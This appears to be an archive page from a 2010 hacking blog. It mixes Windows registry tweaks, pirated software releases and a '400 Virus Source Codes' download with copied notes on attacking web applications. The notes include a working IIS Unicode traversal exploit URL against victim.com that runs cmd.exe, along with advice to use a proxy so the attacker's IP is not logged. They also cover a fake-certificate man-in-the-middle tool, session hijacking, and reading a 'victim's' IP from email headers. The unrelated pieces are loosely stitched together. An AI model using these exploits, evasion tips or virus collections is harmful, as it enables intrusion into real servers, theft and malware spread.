Home » Archives for April 2010
Change Registered Owner Info On your Windows
Change Registered Owner Information
This is small and simple registry tweak you can perform so as to change the registered owner information of your computer/windows which you have entered wrong during the windows installation.
On run command, type regedit(regedit32 in some) and hit enter to start registry editor. First make a backup of your registry so that u can be safe if any mistake is done. I would say, make backup of registry before any tweak with it.
Now go to:
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion

Change Yahoo Messenger Title
Steps:
- Go to folder where you have installed yahoo messenger (ex: C:\Program Files\Yahoo!\Messenger)
- there u'll find one file named 'ymsgr' (Don't be confused with other file names. there's only one file named 'ymsgr')
- Open the file, go to the end and write following code:
[APP TITLE]
CAPTION=ADNAN
(In place of ADNAN you can write your own name or your own custom text)
- Save the file

Disable Right Click On your Desktop
This is small and simple registry tweak u can perform so as to disable right click on ur desktop.
On run command, type regedit(regedit32 in some) and hit enter to start registry editor. First make a backup of ur registry so that u can be safe if any mistake is done. I would say, make backup of registry before any tweak with it.
Now go to:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Now add a DWORD value on the right side and name it as NoViewContextMenu.
Give it the value of 1.
Now exit registry and restart ur pc to see the effect. Isn't that cool?
If u want to enable right click again just delete the DWORD value or change its value to 0 and restart ur computer.
CHEERS!

Windows XP NASA Second Generation SP3 2010 (New Links)
WINDOWS XP
Now The Second Generation from Windows XP NASA SP3 2010 comes with New Exclusive Technology .. Used for the first time.. it "Automatic Recovery for Basic System Files in every Windows Boot" or "Self Maintenance" .. This means .. in every time windows reboot .. all basic system files will recover automatically as if windows installed for first time without affecting the programs and other files and without taking additional time!!
That's Amazing!! More use for the Windows increase the speedy and stability .. Windows XP NASA Second Generation SP3 2010 very fast, fully stable, NO system errors, High Internet speed . More developments and improvements for all features and functions of the previous edition "XP NASA SPACE v1.0 SP3 2010" VGA clarity, sound effects, Graphics and Multimedia, New 3D Themes Multi Color, Icons, 3D Wallpapers and Transparency.
Release Name: Windows XP NASA Second Generation SP3 2010

Finding IP From GMAIL Headers
When You send an email to any of your friends or others could be your Girl friends Never mind. But When you send the email through any email client like Gmail , Yahoo Mail , Hotmail, AOL, Outlook Express, etc it also sends the Email Header which contains Some important information for Us i.e.Hackers.
Basically it is a feature of Mailing protocol.
Now when the victim sends you a Email through any ,Gmail, Yahoo mail etc doesn't matter, then mail comes to your inbox in the form of Email Header but the your Email client changes it and shows only readable part of it.
Well This article is based on how to view Email headers in Gmail. We Will talk about others in Future too. Yeah its a kind of easy tutorial....
Finding IP address in Gmail
Login to your Gmail account with your username and password.
Open the mail.

Google Operating System 2010 (Android LiveCD - No Instalation)
File: ISO
Size: 172.46 Mb
Checksums
MD5 E0C5C305F78CD958DBAEA3716C82296F
SHA-1 741B42748666AC085FC12692AC6AFB369B002A2E
CRC32 EEDBFF00

Change Google logo to your name
change google logo to your name
code
go to
http://www.google.com.pk
and now in adress bar type
http://www.shinysearch.com/randomlogo.php?ltext=ADNAN
replace ADNAN by your name

Megaupload and depositfiles premium hack

Phone Unlock v7.1
Most phones will need a data cable to connect your Handset to the PC.
Most models catered for
- Ericsson: (virtually all models covered)
- LG: (virtually all models covered)
- Mitsibushi: (virtually all models covered)
- Motorola: (virtually all models covered)
=> also V3 - Black, Blue, Green, Pink & Silver
- NEC: (virtually all models covered)
- Nokia: (virtually all models covered)
- Panasonic: (virtually all models covered)
- Philips: (virtually all models covered)
- Sagem: (virtually all models covered)
- Samsung: (virtually all models covered)
- Sharp: (Inc. GX’s) (virtually all models covered)
- Siemens: (virtually all models covered)
- Sony: (virtually all models covered)
You can do the upgrade at home/work with a USB cable in 20 minutes
all you require is a 'USB to mini-USB' cable to connect your V3 Handset to the PC
this cable is normally provided with your phone.

400 Virus Source Codes - My Best Virus Code Collection
DOWNLOAD FROM HERE
400 Virus Source Codes
- Avispa.dr
- Dark Avenger
- AVA.550
- Univ/a
- Auspar.377
- Auspar.338
- OC/oops
- Middle
- Auspar.635

Password Guessing
Attack Methods | Often Web sites advise users to choose memorable passwords such as birthdays, names of friends or family, or social security numbers. This is extremely poor advice, as such passwords are easily guessed by an attacker who knows the user. The most common way an attacker will try to obtain a password is through the dictionary attack'. In a dictionary attack, the attacker takes a dictionary of words and names, and tries each one to see if it is the require password. This can be |

Web Based Password Cracking Techniques
Once the information has been processed, Passport redirects the user to a page on Passport.net.
Note | However, passport has been plagued with security issues - right from reuse of authentication cache to privacy flouting activities. Apart from this exploits that plague Microsoft based web systems such as Unicode exploits, cross site scripting and cookie stealing cast more than a shadow of doubt on this means of authentication. |
It is highly customizable authentication mechanism that uses a form composed of HTML with
After the data input via HTTP or SSL, it is evaluated by some server-side logic and if the credentials are valid, then a cookie is given to the client to be reused on subsequent visits.
Forms based authentication technique is the popular authentication technique on the internet.
Note | Forms Authentication Flow
|
-
-
WinSSLMiM is an HTTPS Man in the Middle attacking tool. It includes FakeCert, a tool to make fake certificates. -
It can be used to exploit the Certificate Chain vulnerability in Internet Explorer. The tool works under Windows 9x/2000. -
Usage:-
FakeCert: fc -h -
WinSSLMiM: wsm -h
-
Note | When a web browser receives the certificate, it should verify that the CN field matches the domain it just connected to, and that it is signed by a known CA certificate. No man in the middle attack is possible because it should not be possible to substitute a certificate with a valid CN and a valid signature. However, it is possible that the signing authority has been delegated to more localized authorities. In this case, the administrator of www.website.com will get a chain of certificates from the localized authority: |
Attack Methods | However, as far as IE is concerned, anyone with a valid CA-signed certificate for any domain can generate a valid CA-signed certificate for any other domain. If an attacker wants to, he can generate a valid certificate and request a signature from VeriSign: [CERT - Issuer: VeriSign / Subject: VeriSign] -> [CERT - Issuer: VeriSign / Subject: www.attacker.com] |
Tools | WinSSLMiM is an HTTPS Man in the Middle attacking tool. It includes FakeCert, a tool to make fake certificates. It can be used to exploit the Certificate Chain vulnerability in Internet Explorer. The tool works under Windows 9x/2000. ........................................................................................................................... .................................................. ........................................................................................................................... .................................................. ........................................................................................................................... .................................................. |

What is cookie?
Persistent cookies are stored in a text file (cookies.txt under Netscape and multiple *.txt files for Internet Explorer) on the client and are valid for as long as the expiry date is set for (see below). Non-Persistent cookies are stored in RAM on the client and are destroyed when the browser is closed or the cookie is explicitly killed by a log-off script.
Secure cookies can only be sent over HTTPS (SSL). Non-Secure cookies can be sent over HTTPS or regular HTTP. The title of secure is somewhat misleading. It only provides transport security. Any data sent to the client should be considered under the total control of the end user, regardless of the transport mechanism in use.

Authentication And Session Management
Attack Methods | Brute Force Brute Forcing involves performing an exhaustive key search of a web application authentication token's key space in order to find a legitimate token that can be used to gain access. |
user-pass | = | userid ":" password |
userid | = | * |
password | = | *TEXT |
Authorization: Basic bjplc2vcGZQQWxRpVuIHhZGNFt==
Attack Methods | Session Replay If a user's authentication tokens are captured or intercepted by an attacker, the session can be replayed by the attacker, making the concerned web application vulnerable to a replay attack. In a replay attack, an attacker openly uses the captured or intercepted authentication tokens such as a cookie to create or obtain service from the victim's account; thereby bypassing normal user authentication methods. |
-
Visiting a pre-existing dynamically created URL that is assigned to a specific user's account which has been sniffed or captured from a proxy server log -
Visiting a specific URL with a preloaded authentication token (cookie, HTTP header value, etc.) captured from a legitimate user -
A combination of 1 and 2.
Attack Methods | Session Forging/Brute-Forcing Detection and/or Lockout Many websites have prohibitions against unrestrained password guessing (e.g., it can temporarily lock the account or stop listening to the IP address). With regard to session token brute-force attacks, an attacker can probably try hundreds or thousands of session tokens embedded in a legitimate URL or cookie for example without a single complaint from the HTTP server. Many intrusion-detection systems do look for this type of attack; penetration tests also often overlook this weakness in web e-commerce systems. Designers can use "booby trapped" session tokens that never actually get assigned but will detect if an attacker is trying to brute force a range of tokens. Anomaly/misuse detection hooks can also be built in to detect if an authenticated user tries to manipulate their token to gain elevated privileges. |
Attack Methods | Session Re-Authentication Critical user actions such as money transfer or significant purchase decisions should require the user to re-authenticate or be reissued another session token immediately prior to significant actions. Developers can also somewhat segment data and user actions to the extent where reauthentication is required upon crossing certain "boundaries" to prevent some types of cross-site scripting attacks that exploit user accounts. |
Attack Methods | Session Token Transmission If a session token is captured in transit through network interception, a web application account is then prone to a replay or hijacking attack. Typical web encryption technologies include but are not limited to Secure Sockets Layer (SSLv2/v3) and Transport Layer Security (TLS v1) protocols in order to safeguard the state mechanism token. |
Attack Methods | Session Tokens on Logout With the popularity of Internet Kiosks and shared computing environments on the rise, session tokens take on a new risk. A browser only destroys session cookies when the browser thread is torn down. Most Internet kiosks maintain the same browser thread. It is recommended to overwrite session cookies when the user logs out of the application. |
Attack Methods | Page Sequencing Page sequencing is the term given to the vulnerability that arises as a result of poor session management, thereby allowing the user to take an out of turn action and bypass the defined sequence of web pages. This can be something like moving ahead to a later stage of a financial transaction. This arises due to faulty session/application state management. |
-
User is logged on to a web application and the session is currently active. An attacker knows of a XSS hole that affects that application. -
The user receives a malicious XSS link via an e-mail or comes across it on a web page. In some cases an attacker can even insert it into web content (e.g. guest book, banner, etc,) and make it load automatically without requiring user intervention.
Attack Methods | It is a fact that most web sites address security using SSL for authenticating their login sessions. Let us see how this process takes place. When the client connects to a web site two events take place to ensure security. |
-
The web site must prove that it is the web site it claims to be.
-
The user must authenticate self to the web site
-
Persistent and Secure -
Persistent and Non-Secure -
Non-Persistent and Secure -
Non-Persistent and Non-Secure
..................................................................................................................................................................... ..................................................................................................................................................................................................... .................................................................................................................................................................................................. .............................

What is Cross Side Scripting (XSS)?
The simplest description of cross-site scripting can be put as the attack that occurs when a user enters malicious data in a Web site. It can be as simple as posting a message that contains malicious code to a newsgroup. When another person views this message, the browser will interpret the code and execute it, often giving the attacker control of the system. Malicious scripts can also be executed automatically based on certain events, such as when a picture loads. Unlike most security vulnerabilities, CSS doesn't apply to any single vendor's products - instead, it can affect any software that runs on a web server |
-
As a web application user, there are a few ways to protect yourselves from XSS attacks. -
The first and the most effective solution is to disable all scripting language support in your browser and email reader. -
If this is not a feasible option for business reasons, another recommendation is to use reasonable caution while clicking links in anonymous e-mails and dubious web pages. -
Proxy servers can help filter out malicious scripting in HTML.Preventing cross-site scripting is a challenging task especially for large distributed web applications. If the application accepts only expected input, then the XSS can be significantly reduced.Web servers should set the character set, and then make sure that the data they insert is free from byte sequences that are special in the specified encoding. This can typically be done by settings in the application server or web server. The server should define the character set in each html page as below.Web pages with unspecified character-encoding work mostly because most character sets assign the same characters to byte values below 128. Some 16-bit character-encoding schemes have additional multi-byte representations for special characters such as "<. These should be checked.

Input Manipulation : Web Application Vulnerabilities
In the context of a web based attack (or web server attack), the attacker will first try to probe and manipulate the input fields to gain access into the web server. They can be broadly categorized as given below. |

Web Application Vulnerabilities
Understanding Web Application Security
Common Web Application Security Vulnerabilities
Web Application Penetration Methodologies
Input Manipulation
Authentication And Session Management
Tools: Lynx, Teleport Pro, Black Widow, Web Sleuth
Countermeasures
Web based application security differs from the general discussion on security. In the general context, usually an IDS and/firewall lends some degree of security. However in the case of web applications, the session takes place through the allowed port - the default web server port 80. This is equivalent to establishing a connection without a firewall. Even if encryption is implemented, it only encrypts the transport protocol and in the event of an attack, the attacker's session will just be encrypted in nature. Encryption does not thwart the attack. |
-
Reliability of Client-Side Data -
Special Characters that have not been escaped -
HTML Output Character Filtering -
Root accessibility of web applications -
ActiveX/JavaScript Authentication -
Lack of User Authentication before performing critical tasks.
Threat | Reliability of Client-Side Data: It is recommended that the web application rely on server side data for critical operations rather than the client side data, especially for input purposes. |
Threat | Special Characters that have not been escaped: Often this aspect is overlooked and special characters that can be used to modify the instructions by the attackers are found in the web application code. For example, UTF-7 provides alternative encoding for "<" and ">", and several popular browsers recognize these as the start and end of a tag. |
Threat | HTML Output Character Filtering: Output filtering helps a developer build an application which is not susceptible to cross site scripting attacks. When information is displayed to users, it should be escaped. HTML should be rendered inactive to prevent cross site scripting attacks. |
Threat | Root accessibility of web applications: Ideally web applications should not expose the root directory of the web server. Sometimes, it is possible for the user to access the root directory if he can manipulate the input or the URL. |
Threat | ActiveX/JavaScript Authentication: Client side scripting languages are vulnerable to attacks such as cross side scripting. |
Threat | Lack of User Authentication before performing critical tasks: An obvious security lapse, where restricted area access is given without proper authentication, reuse of authentication cache or poor logout procedures. These applications can be vulnerable to cookie based attacks. |
-
Information Gathering and Discovery-
Documenting Application / Site Map -
Identifiable Characteristics / Fingerprinting -
Signature Error and Response Codes -
File / Application Enumeration-
Forced Browsing -
Hidden Files -
Vulnerable CGIs -
Sample Files
-
-
-
Input/Output Client-Side Data Manipulation
-
Instant Source lets you take a look at a web page's source code, to see how things are done. Also, you can edit HTML directly inside Internet Explorer! -
The program integrates into Internet Explorer and opens a new toolbar window which instantly displays the source code for whatever part of the page you select in the browser window.
Instant Source is an application that lets the user view the underlying source code as he browses a web page. The traditional way of doing this has been the View Source command in the browser. However, the process was tedious as the viewer has to parse the entire text file if he is searching for a particular block of code. Instant Source allows the user to view the code for the selected elements instantly without having to open the entire source. |
-
Lynx is a text-based browser used for downloading source files and directory links.
Lynx is a text browser client for users running cursor-addressable, character-cell display devices. It can display HTML documents containing links to files on the local system, as well as files on remote systems running http, gopher, ftp, wais, nntp, finger, or cso/ph/qi servers, and services accessible via logins to telnet, tn3270 or rlogin accounts. Current versions of Lynx run on UNIX, VMS, Windows3.x/9x/NT, 386DOS and OS/2 EMX. |
-
Wget is a command line tool for Windows and Unix that will download the contents of a web site. -
It works non-interactively, so it will work in the background, after having logged off. -
Wget works particularly well with slow or unstable connections by continuing to retrieve a document until the document is fully downloaded. -
Both http and ftp retrievals can be time stamped, so Wget can see if the remote file has changed since the last retrieval and automatically retrieve the new version if it has.
GNU Wget is a freely available network utility to retrieve files from the Internet using HTTP and FTP. It works non-interactively, allowing the user to enabling work in the background, after having logged off. The recursive retrieval of HTML pages, as well as FTP sites is supported. Can be used to make mirrors of archives and home pages, or traverse the web like a WWW robot. |
-
Black widow is a website scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program. -
Use it to scan a site and create a complete profile of the site's structure, files, E-mail addresses, external links and even link errors.
Another tool that can be found in an attacker's arsenal is Black Widow. This tool can be used for various purposes because it functions as a web site scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program. Note its use as a site mirroring tool. An attacker can use it to mirror the target site on his hard drive and parse it for security flaws in the offline mode. |
-
WebSleuth is an excellent tool that combines spidering with the capability of a personal proxy such as Achilles.
Websleuth is a tool that combines web crawling with the capability of a personal proxy. The current version of sleuth supports functionality to: convert hidden & select form elements to textboxes; efficient forms parsing and analysis; edit rendered source of WebPages; edit raw cookies in their raw state etc. |
-
Hidden fields are embedded within HTML forms to maintain values that will be sent back to the server. -
Hidden fields serve as a mean for the web application to pass information between different applications. -
Using this method, an application may pass the data without saving it to a common backend system (typically a database.) -
A major assumption about the hidden fields is that since they are non visible (i.e. hidden) they will not be viewed or changed by the client. -
Web attacks challenge this assumption by examining the HTML code of the page and changing the request (usually a POST request) going to the server. -
By changing the value the entire logic between the different application parts, the application is damaged and manipulated to the new value.
Hidden field tampering: Most of us who have dabbled with some HTML coding have come across the hidden field. For example, consider the code below: |

Top20 Scan Method : Hacking Web Servers
-
WebInspect is an impressive Web server and application-level vulnerability scanner which scans over 1500 known attacks. -
It checks site contents and analyzes for rudimentary application-issues like smart guesswork checks, password guessing, parameter passing, and hidden parameter checks. -
It can analyze a basic Webserver in 4 minutes cataloging over 1500 HTML pages
-
Security scanner is designed to identify known and unknown vulnerabilities, suggest fixes to identified vulnerabilities, and report possible security holes within a network's internet, intranet and extranet environments. -
Shadow Security Scanner includes vulnerability auditing modules for many systems and services.These include NetBIOS, HTTP, CGI and WinCGI, FTP, DNS, DoS vulnerabilities, POP3, SMTP,LDAP,TCP/IP, UDP, Registry, Services, Users and accounts, Password vulnerabilities, publishing extensions, MSSQL,IBM DB2, Oracle, MySQL, PostgressSQL, Interbase, MiniSQL and
-
IISLockdown:-
IISLockdown restricts anonymous access to system utilities as well as the ability to write to Web content directories. -
It disables Web Distributed Authoring and Versioning (WebDAV). -
It installs the URLScan ISAPI filter.
-
-
URLScan:-
URLScan is a security tool that screens all incoming requests to the server by filtering the requests based on rules that are set by the administrator.
-
-
Web servers assume critical importance in the realm of Internet security. -
Vulnerabilities exist in different releases of popular web servers and respective vendors patch these often. -
The inherent security risks owing to compromised web servers have impact on the local area networks that host these web sites, even the normal users of web browsers. -
Looking through the long list of vulnerabilities that had been discovered and patched over the past few years provide an attacker ample scope to plan attacks to unpatched servers. -
Different tools/exploit codes aids an attacker perpetrate web server hacking. -
Countermeasures include scanning, for existing vulnerabilities and patching them immediately, anonymous access restriction, incoming traffic request screening and filtering.

Canonicalization : Vulnerability : Exploit : Unicode
Canonicalization
Vulnerability
Exploit
-
To begin, the attacker copies ".. \..\winnt\system32\cmd.exe" to "..\..\interpub\scripts\cmd1.exe" -
He appends the command to the valid URL.Vulnerable IIS returns: "CGI Error ... 1 file(s) copied."The specified CGI application does not return a complete set of HTTP headers. Instead it returns the above error. -
Next the attacker runs "cmd1.exe /c echo abc >aaa & dir & type aaa" along with the URL to list the directory contents.Vulnerable IIS returns:" Directory of c: \inetpub\scripts 10/25/2000 03:48p
. 10/25/2000 03:48p .. 10/25/2000 03:51p 6 aaa 12/07/1999 05:00a 236,304 cmd1.exe .. abc
-
ASCII characters for the dots are replaced with hexadecimal equivalent (%2E). -
ASCII characters for the slashes are replaced with Unicode equivalent (%co%af). -
Unicode 2.0 allows multiple encoding possibilities for each characters. -
Unicode for"/": 2f, c0af, e080af, f08080af, f8808080af,..... -
Overlong Unicode are NOT malformed, but not allowed by a correct Unicode encoder and decoder. -
Maliciously used to bypass filters that only check short Unicode.
-
A writeable or executable directory is available; allowing attackers to upload malicious code. -
A system executable such as cmd.exe is available on the root and does not have an access control list applied to it.
-
IIS logs all the visits in log files. The log file is located at <%systemroot%>\logfiles -
Be careful. If you don't use proxy, then your IP will be logged. -
This command lists the log files:
http://victim.com/scripts/..%c0%af../.. %c 0%af../..%c0%af../..%c0%af../..%c0%af../
. .%c0%af../..%c0%af../..%c0%af../winnt/sys tem32/cmd.exe?/c+dir+C:\Winnt\system32
\Lo gfiles\W3SVC1
Capturing and maintaining log files are critical to the secure administration of a web server. While it is generally considered that the log does not capture an intrusion till after the request has been processed, a diligent administrator might couple logging with tools such as urlscan which will make logging more effective. Here, we will discuss some of the best practices that can be followed when it comes to IIS logs. The best way to emphasize the value and importance of IIS log files would be to draw a comparison to a crime scene, such that while handling IIS logs, they must be treated as if they are evidence already. Coupling IIS logs with other monitoring records such as Firewall logs, IDS logs, and even TCPDump can lend more credibility in the event of the log being used for evidence. |
